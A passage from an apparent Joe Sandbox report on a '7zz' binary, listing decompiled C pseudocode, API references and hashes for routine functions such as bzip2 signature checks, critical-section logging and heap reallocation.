						_t85 =  *_t55;
						 *((char*)(_t108 + _t55)) = _t85;
						_t55 = _t55 + 1;
					} while (_t85 != 0);
				}
				E00407CD5( *((intOrPtr*)(_t121 + 0x24)),  &_v160);
				L00407CAC( *((intOrPtr*)(_t121 + 0x24)));
				 *((intOrPtr*)(_t121 + 8)) =  *((intOrPtr*)(_t121 + 0x10));
				_t60 =  *((intOrPtr*)(_t121 + 0x14));
				 *((intOrPtr*)(_t121 + 0xc)) = _t60;
				return _t60;
			}








































                                                                                                                                    0x004060df
                                                                                                                                    0x004060e2
                                                                                                                                    0x004060e5
                                                                                                                                    0x004060ec
                                                                                                                                    0x00406107
                                                                                                                                    0x0040610c
                                                                                                                                    0x004060ee
                                                                                                                                    0x004060ee
                                                                                                                                    0x004060f0
                                                                                                                                    0x004060f0
                                                                                                                                    0x00406113
                                                                                                                                    0x00406116
                                                                                                                                    0x0040611f
                                                                                                                                    0x00406125
                                                                                                                                    0x0040612a
                                                                                                                                    0x0040612f
                                                                                                                                    0x00406132
                                                                                                                                    0x00406135
                                                                                                                                    0x00406138
                                                                                                                                    0x0040613a
                                                                                                                                    0x0040613a
                                                                                                                                    0x0040613c
                                                                                                                                    0x0040613f
                                                                                                                                    0x00406144
                                                                                                                                    0x00406146
                                                                                                                                    0x00406146
                                                                                                                                    0x0040614c
                                                                                                                                    0x00406152
                                                                                                                                    0x00406155
                                                                                                                                    0x00406159
                                                                                                                                    0x0040615b
                                                                                                                                    0x00406164
                                                                                                                                    0x0040616a
                                                                                                                                    0x0040616d
                                                                                                                                    0x00406171
                                                                                                                                    0x0040617b
                                                                                                                                    0x0040617e
                                                                                                                                    0x0040617e
                                                                                                                                    0x00406180
                                                                                                                                    0x00406180
                                                                                                                                    0x00406183
                                                                                                                                    0x00406183
                                                                                                                                    0x00406186
                                                                                                                                    0x0040618b
                                                                                                                                    0x0040618d
                                                                                                                                    0x0040618f
                                                                                                                                    0x00406196
                                                                                                                                    0x004061a0
                                                                                                                                    0x004061a0
                                                                                                                                    0x004061a7
                                                                                                                                    0x004061a9
                                                                                                                                    0x004061a9
                                                                                                                                    0x004061ae
                                                                                                                                    0x004061b1
                                                                                                                                    0x004061b3
                                                                                                                                    0x004061ba
                                                                                                                                    0x004061bc
                                                                                                                                    0x004061be
                                                                                                                                    0x004061c1
                                                                                                                                    0x004061c4
                                                                                                                                    0x004061cb
                                                                                                                                    0x004061cd
                                                                                                                                    0x004061cd
                                                                                                                                    0x004061cf
                                                                                                                                    0x004061d2
                                                                                                                                    0x004061d7
                                                                                                                                    0x004061d9
                                                                                                                                    0x004061dc
                                                                                                                                    0x004061e1
                                                                                                                                    0x004061e3
                                                                                                                                    0x004061e3
                                                                                                                                    0x004061e5
                                                                                                                                    0x004061e8
                                                                                                                                    0x004061e9
                                                                                                                                    0x004061e3
                                                                                                                                    0x004061f7
                                                                                                                                    0x004061ff
                                                                                                                                    0x00406208
                                                                                                                                    0x0040620b
                                                                                                                                    0x0040620e
                                                                                                                                    0x00406214

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldiv
                                                                                                                                    • String ID: $ $%
                                                                                                                                    • API String ID: 3732870572-114112156
                                                                                                                                    • Opcode ID: 5f3be3b97577a96593b7eed08c3f672e33e18b0ddb9a91ce93faccb85b3d0260
                                                                                                                                    • Instruction ID: b857c6e470453704c1f0b52f1adfc20138d148c1cd609403c8723782e6e4065e
                                                                                                                                    • Opcode Fuzzy Hash: 5f3be3b97577a96593b7eed08c3f672e33e18b0ddb9a91ce93faccb85b3d0260
                                                                                                                                    • Instruction Fuzzy Hash: 5241B531B007089BDB24CE69D891AAAB7F6EF88304F14853ED546E7382EB34AD18C754
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0041CC41 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E0041CC41() {
				void* _t29;
				void* _t35;
				intOrPtr* _t36;
				void* _t45;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr* _t49;
				void* _t51;
				void* _t53;

				L0046B890(E00475648, _t51);
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				_t49 =  *((intOrPtr*)(_t51 + 8));
				 *(_t51 - 4) = 1;
				 *((intOrPtr*)(_t51 - 0x10)) = _t53 - 0xc;
				 *((intOrPtr*)( *_t49 + 0x10))(_t49, _t45, _t48, _t35);
				_t46 =  *((intOrPtr*)(_t51 + 0xc));
				_t36 = _t49 + 0x28;
				_t29 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, 0, 0, 1, _t36);
				_t56 = _t29;
				if(_t29 == 0) {
					_t29 = E0040FAC0(_t56, 3);
					if(_t29 == 0) {
						if( *((char*)(_t51 + 8)) != 0x42 ||  *((char*)(_t51 + 9)) != 0x5a ||  *((char*)(_t51 + 0xa)) != 0x68) {
							_t29 = 1;
						} else {
							_t29 =  *((intOrPtr*)( *_t46 + 0x10))(_t46, 0, 0, 2, _t51 - 0x18);
							if(_t29 == 0) {
								 *((char*)(_t49 + 0x30)) = 1;
								asm("sbb ecx, [ebx+0x4]");
								 *((intOrPtr*)(_t49 + 0x20)) =  *((intOrPtr*)(_t51 - 0x18)) -  *_t36;
								 *((intOrPtr*)(_t49 + 0x24)) =  *((intOrPtr*)(_t51 - 0x14));
								E0040C9B4(_t49 + 0x14, _t46);
								E0040C9B4(_t49 + 0x18, _t46);
								_t29 = 0;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return _t29;
			}












                                                                                                                                    0x0041cc46
                                                                                                                                    0x0041cc4e
                                                                                                                                    0x0041cc54
                                                                                                                                    0x0041cc58
                                                                                                                                    0x0041cc5e
                                                                                                                                    0x0041cc62
                                                                                                                                    0x0041cc65
                                                                                                                                    0x0041cc68
                                                                                                                                    0x0041cc75
                                                                                                                                    0x0041cc78
                                                                                                                                    0x0041cc7a
                                                                                                                                    0x0041cc83
                                                                                                                                    0x0041cc8a
                                                                                                                                    0x0041cc90
                                                                                                                                    0x0041cce5
                                                                                                                                    0x0041cc9e
                                                                                                                                    0x0041ccab
                                                                                                                                    0x0041ccb0
                                                                                                                                    0x0041ccbb
                                                                                                                                    0x0041ccbf
                                                                                                                                    0x0041ccc2
                                                                                                                                    0x0041ccc5
                                                                                                                                    0x0041cccb
                                                                                                                                    0x0041ccd4
                                                                                                                                    0x0041ccd9
                                                                                                                                    0x0041ccd9
                                                                                                                                    0x0041ccb0
                                                                                                                                    0x0041cc90
                                                                                                                                    0x0041cc8a
                                                                                                                                    0x0041ccf8
                                                                                                                                    0x0041cd01

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: B$Z$h
                                                                                                                                    • API String ID: 3519838083-418080759
                                                                                                                                    • Opcode ID: e27ca44641f6d3a39d7cf6b47e3b5a49e6ed396509ae319c0575fe9804f9460e
                                                                                                                                    • Instruction ID: 95da72c9e758c624e4a23e77763632c46c0b47913da8fea83fca01b435c30606
                                                                                                                                    • Opcode Fuzzy Hash: e27ca44641f6d3a39d7cf6b47e3b5a49e6ed396509ae319c0575fe9804f9460e
                                                                                                                                    • Instruction Fuzzy Hash: 3621C771640604FFDB20CF24CC81BEE7BA4BF45B04F14451EF906AB281E3B4AA44C795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004065F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E004065F1(void* __ecx) {
				intOrPtr* _t29;
				void* _t32;
				void* _t47;
				void* _t53;

				L0046B890(0x473548, _t53);
				_t47 = __ecx;
				 *(_t53 - 0x10) = 0x490a88;
				EnterCriticalSection(0x490a88);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				E00415C6D(_t47 + 0x60,  *((intOrPtr*)(_t53 + 0xc)));
				L00403532(_t53 - 0x1c,  *((intOrPtr*)(_t53 + 8)));
				_push(_t53 - 0x1c);
				 *(_t53 - 4) = 1;
				E00406796(_t47 + 0x4c);
				 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
				E00407A18( *((intOrPtr*)(_t53 - 0x1c)));
				_t48 = _t47 + 8;
				E00406000(_t47 + 8);
				E004060BD(_t48);
				E0040608D(_t48, "WARNING: ");
				_t29 = E00404B09(_t53 - 0x1c,  *((intOrPtr*)(_t53 + 0xc)));
				 *(_t53 - 4) = 2;
				E004060A5(_t48,  *_t29);
				E00407A18( *((intOrPtr*)(_t53 - 0x1c)));
				LeaveCriticalSection(0x490a88);
				_t32 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t32;
			}







                                                                                                                                    0x004065f6
                                                                                                                                    0x00406605
                                                                                                                                    0x00406608
                                                                                                                                    0x0040660b
                                                                                                                                    0x00406614
                                                                                                                                    0x0040661b
                                                                                                                                    0x00406626
                                                                                                                                    0x00406631
                                                                                                                                    0x00406632
                                                                                                                                    0x00406636
                                                                                                                                    0x0040663e
                                                                                                                                    0x00406642
                                                                                                                                    0x00406648
                                                                                                                                    0x0040664d
                                                                                                                                    0x00406654
                                                                                                                                    0x00406660
                                                                                                                                    0x0040666b
                                                                                                                                    0x00406674
                                                                                                                                    0x00406678
                                                                                                                                    0x00406680
                                                                                                                                    0x00406687
                                                                                                                                    0x00406692
                                                                                                                                    0x00406695
                                                                                                                                    0x0040669d

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004065F6
                                                                                                                                    • EnterCriticalSection.KERNEL32(00490A88), ref: 0040660B
                                                                                                                                      • Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B
                                                                                                                                      • Part of subcall function 00404B09: __EH_prolog.LIBCMT ref: 00404B0E
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00490A88,?,?,?), ref: 00406687
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$CriticalSection$EnterLeave
                                                                                                                                    • String ID: WARNING:
                                                                                                                                    • API String ID: 2490926211-3509524770
                                                                                                                                    • Opcode ID: f1e17dd44587561c5c06765c6a73770b15ebc0bdbd4201d644edde32ea7bff0d
                                                                                                                                    • Instruction ID: 4da438c53a722fe7a77adf22add2750a6654a71b2c88e06f60811bef9031d0d9
                                                                                                                                    • Opcode Fuzzy Hash: f1e17dd44587561c5c06765c6a73770b15ebc0bdbd4201d644edde32ea7bff0d
                                                                                                                                    • Instruction Fuzzy Hash: 95118F31E00149ABDB05FF65D846BEDBB79AF90318F10802EF406772D2DB7C1A159B9A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00471F76 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedIncrement.KERNEL32(00496224), ref: 00471F9C
                                                                                                                                    • InterlockedDecrement.KERNEL32(00496224), ref: 00471FB1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$DecrementIncrement
                                                                                                                                    • String ID: $bI
                                                                                                                                    • API String ID: 2172605799-2563688255
                                                                                                                                    • Opcode ID: 14794fd947a66a7e740a79147c95f718189372345e86d1cd971f01589f6869bf
                                                                                                                                    • Instruction ID: f620e85f8d82dfbac1e457229ba36f5d0a3130eb6314d64e12aaba347fa3cd4d
                                                                                                                                    • Opcode Fuzzy Hash: 14794fd947a66a7e740a79147c95f718189372345e86d1cd971f01589f6869bf
                                                                                                                                    • Instruction Fuzzy Hash: 0BF0C232105242ABE720BFAEACC5DDB6795FB91719F10883FF008851A0D7689985951E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00470DBD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 16%
                                                                                                                                    			E00470DBD(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t19;

				InterlockedIncrement(0x496224);
				_t19 =  *0x496220; // 0x0
				if(_t19 != 0) {
					InterlockedDecrement(0x496224);
					E0046E56A(0x13);
					_push(1);
					_pop(0);
				}
				_a8 = E00470E16(_a4, _a8);
				if(0 == 0) {
					InterlockedDecrement(0x496224);
				} else {
					E0046E5CB(0x13);
				}
				return _a8;
			}




                                                                                                                                    0x00470dc9
                                                                                                                                    0x00470dd7
                                                                                                                                    0x00470ddd
                                                                                                                                    0x00470de0
                                                                                                                                    0x00470de4
                                                                                                                                    0x00470dea
                                                                                                                                    0x00470dec
                                                                                                                                    0x00470dec
                                                                                                                                    0x00470df9
                                                                                                                                    0x00470dff
                                                                                                                                    0x00470e0c
                                                                                                                                    0x00470e01
                                                                                                                                    0x00470e03
                                                                                                                                    0x00470e08
                                                                                                                                    0x00470e15

                                                                                                                                    APIs
                                                                                                                                    • InterlockedIncrement.KERNEL32(00496224), ref: 00470DC9
                                                                                                                                    • InterlockedDecrement.KERNEL32(00496224), ref: 00470DE0
                                                                                                                                      • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                                                                                      • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                                                                                    • InterlockedDecrement.KERNEL32(00496224), ref: 00470E0C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Interlocked$CriticalDecrementSection$EnterIncrementInitialize
                                                                                                                                    • String ID: $bI
                                                                                                                                    • API String ID: 2038102319-2563688255
                                                                                                                                    • Opcode ID: efb15d606f5e44fd71a55acc674efbc2999dbd389be6925d70f36fac0792ac87
                                                                                                                                    • Instruction ID: a29c1fd973d67cf1eab9a1632a1b120ecfaf970aee40f0b8d32a81a5239f5549
                                                                                                                                    • Opcode Fuzzy Hash: efb15d606f5e44fd71a55acc674efbc2999dbd389be6925d70f36fac0792ac87
                                                                                                                                    • Instruction Fuzzy Hash: AAF0B436102119FEEB102B96AC419CF7798EF44728F11843FF508491519B745A818999
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00458600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                    			E00458600() {
				signed int _t4;

				_t4 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetLargePageMinimum");
				if(_t4 != 0) {
					_t4 =  *_t4();
					if(_t4 != 0) {
						_t1 = _t4 - 1; // -1
						if((_t4 & _t1) == 0) {
							 *0x491560 = _t4;
							return _t4;
						}
					}
				}
				return _t4;
			}




                                                                                                                                    0x00458611
                                                                                                                                    0x00458619
                                                                                                                                    0x0045861b
                                                                                                                                    0x0045861f
                                                                                                                                    0x00458621
                                                                                                                                    0x00458626
                                                                                                                                    0x00458628
                                                                                                                                    0x00000000
                                                                                                                                    0x00458628
                                                                                                                                    0x00458626
                                                                                                                                    0x0045861f
                                                                                                                                    0x0045862d

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetLargePageMinimum,00403B70,?,?,00000000,00000001,00000000), ref: 0045860A
                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00458611
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                    • String ID: GetLargePageMinimum$kernel32.dll
                                                                                                                                    • API String ID: 1646373207-2515562745
                                                                                                                                    • Opcode ID: e945a4318dcfde84d8dda7067848fc9038098bba741c81babacb23e338e356e1
                                                                                                                                    • Instruction ID: 187617de4669a97dd730b08bbbb79d285659c800799f683955411e203a0e4393
                                                                                                                                    • Opcode Fuzzy Hash: e945a4318dcfde84d8dda7067848fc9038098bba741c81babacb23e338e356e1
                                                                                                                                    • Instruction Fuzzy Hash: C4D0C7F0741316569B145BB15C4C77F3654AB94743B4444BF6806D1191EF29D504CB1D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046C94A Relevance: 6.5, APIs: 5, Instructions: 278COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E0046C94A(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x47c878);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x496584; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x496580, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x493730 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = L0046E8D6(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E0046E56A(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = L0046F866(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x496580, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x49015c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = L0046FC2E(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = L0046F902(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E0046C5C0(_v40, _a4, _t74);
													L0046F8BD(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x496580, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E0046C5C0(_v40, _t97, _t68);
												L0046F8BD(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E0046CC23();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x493730 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = L0046E8D6(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x493730 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E0046E56A(9);
							_v8 = _t113;
							_t80 = L0046EB0B(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0046CAD5();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x496580, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x49657c; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = L0046F314();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = L0046EE5F();
									_v40 = _t89;
									__eflags = _t89 - _t113;
